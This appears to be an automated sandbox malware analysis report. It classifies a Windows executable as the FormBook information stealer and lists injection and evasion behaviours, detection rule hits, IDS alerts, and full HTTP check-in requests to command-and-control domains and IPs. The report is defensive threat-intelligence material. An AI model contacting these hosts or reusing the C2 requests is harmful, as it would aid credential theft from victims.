Windows Analysis Report
1001-13.exe

Overview

General Information

Sample name: 1001-13.exe
Analysis ID: 1589871
MD5: a3356244cc31500c395570f65839865d
SHA1: 6dc52c136f3bf36f6addd123093cf9a1ce27c00f
SHA256: d2934dafa20010b814ef03d80e356d61ca23e54d1b6ec551d60bfe550c7dcd43
Tags: exe, Payment, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1001-13.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\1001-13.exe" MD5: A3356244CC31500C395570F65839865D)
    • svchost.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\1001-13.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OlGIUOYUZW.exe (PID: 6724 cmdline: "C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 6816 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • OlGIUOYUZW.exe (PID: 6688 cmdline: "C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2144 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\1001-13.exe", CommandLine: "C:\Users\user\Desktop\1001-13.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1001-13.exe", ParentImage: C:\Users\user\Desktop\1001-13.exe, ParentProcessId: 1020, ParentProcessName: 1001-13.exe, ProcessCommandLine: "C:\Users\user\Desktop\1001-13.exe", ProcessId: 6192, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\1001-13.exe", CommandLine: "C:\Users\user\Desktop\1001-13.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1001-13.exe", ParentImage: C:\Users\user\Desktop\1001-13.exe, ParentProcessId: 1020, ParentProcessName: 1001-13.exe, ProcessCommandLine: "C:\Users\user\Desktop\1001-13.exe", ProcessId: 6192, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T09:34:24.097632+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49984 | 172.65.235.97 | 80 | TCP
2025-01-13T09:34:47.304477+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49991 | 192.64.119.109 | 80 | TCP
2025-01-13T09:35:02.158009+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49996 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:16.629412+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50000 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:46.127444+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50005 | 162.0.236.169 | 80 | TCP
2025-01-13T09:36:00.142014+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50009 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:14.943423+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50013 | 104.21.16.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T09:34:24.097632+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49984 | 172.65.235.97 | 80 | TCP
2025-01-13T09:34:47.304477+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 192.64.119.109 | 80 | TCP
2025-01-13T09:35:02.158009+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:16.629412+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50000 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:46.127444+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 162.0.236.169 | 80 | TCP
2025-01-13T09:36:00.142014+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:14.943423+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 104.21.16.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T09:34:39.665187+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:42.204787+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:44.760919+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:53.467199+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 188.114.96.3 | 80 | TCP
2025-01-13T09:34:55.999758+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 188.114.96.3 | 80 | TCP
2025-01-13T09:34:59.627388+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:08.890663+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:11.437644+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:13.984667+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:38.388391+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:40.969633+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:43.514733+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:52.390025+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 192.186.58.31 | 80 | TCP
2025-01-13T09:35:54.999329+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 192.186.58.31 | 80 | TCP
2025-01-13T09:35:57.536619+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:07.298525+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:09.839688+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:12.416985+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 104.21.16.1 | 80 | TCP

AV Detection

Source: 1001-13.exe | Avira: detected
Source: 1001-13.exe | Virustotal: Detection: 61%
Source: 1001-13.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1001-13.exe | Joe Sandbox ML: detected
Source: 1001-13.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: chkntfs.pdbGCTL | source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: OlGIUOYUZW.exe, 00000007.00000002.3993968948.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701407747.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: chkntfs.pdb | source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E6C2A2 FindFirstFileExW | 0_2_00E6C2A2
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA68EE FindFirstFileW,FindClose | 0_2_00EA68EE
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00EA698F
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00E9D076
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00E9D3A9
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00EA9642
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00EA979D
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00E9DBBE
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00EA9B2B
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA5C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00EA5C97
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0058CFA0 FindFirstFileW,FindNextFileW,FindClose | 8_2_0058CFA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 4x nop then xor eax, eax | 8_2_00579FB0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 4x nop then pop edi | 8_2_0057EB14
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_045F04DF

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 162.0.236.169:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49984 -> 172.65.235.97:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49984 -> 172.65.235.97:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 192.64.119.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50005 -> 162.0.236.169:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50005 -> 162.0.236.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 192.64.119.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 192.64.119.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 192.64.119.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 192.64.119.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 162.0.236.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 162.0.236.169:80
Source: DNS query: www.laduta.xyz
Source: DNS query: www.explorevision.xyz
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 47.83.1.90
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EACE44 InternetReadFile,SetEvent,GetLastError,SetEvent | 0_2_00EACE44
Source: global traffic | HTTP traffic detected: GET /ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.kx22368.shop Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | HTTP traffic detected: GET /d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.laduta.xyz Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | HTTP traffic detected: GET /pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.einpisalpace.shop Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | HTTP traffic detected: GET /hf4a/?CviT=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&YFCLW=BxgTctSh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.ripbgs.info Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | HTTP traffic detected: GET /t0rn/?YFCLW=BxgTctSh&CviT=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.explorevision.xyz Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | HTTP traffic detected: GET /wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.babyzhibo.net Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
